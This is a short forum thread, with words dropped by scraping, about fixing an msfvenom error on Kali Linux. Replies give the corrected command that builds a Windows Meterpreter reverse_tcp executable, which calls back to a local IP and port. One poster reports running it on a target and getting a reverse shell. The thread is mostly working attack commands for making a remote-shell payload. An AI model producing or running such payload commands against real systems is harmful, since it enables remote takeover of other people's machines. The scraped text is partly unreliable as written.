Custom Payload Kali Linux -
Custom Payload Kali Linux -
root@kali:~# msfvenom windows/meterpreter/reverse_tcp lhost=192.168.49.128 lport=12345 -f exe attempting read payload stdin... must select arch custom payload
i've been googling sometime now, no positive result.
can tell me meant 'you must select arch custom payload'
?
if go msfvenom -h bring help. see command set architecture '-a' need set x86 or other architecture want. command msfvenom windows/meterpreter/reverse_tcp lhost=192.168.49.128 lport=12345 -a x86 -f exe > yourexploit.exe
you're gonna need specify payload including '-p' in front end of payload description, command msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.49.128 lport=12345 -a x86 -f exe > yourexploit.exe
. it's gonna complain no platform selected selected 1 you... "no platform selected, choosing msf::module::platform::windows payload", you'll "found 0 compatible encoders", ignore that. type in "file yourexploit.exe" , should give info saying pe32 executable....then you're go. figured out , worked me, ran the .exe in target , got reverse shell. luck!
payload
Comments
Post a Comment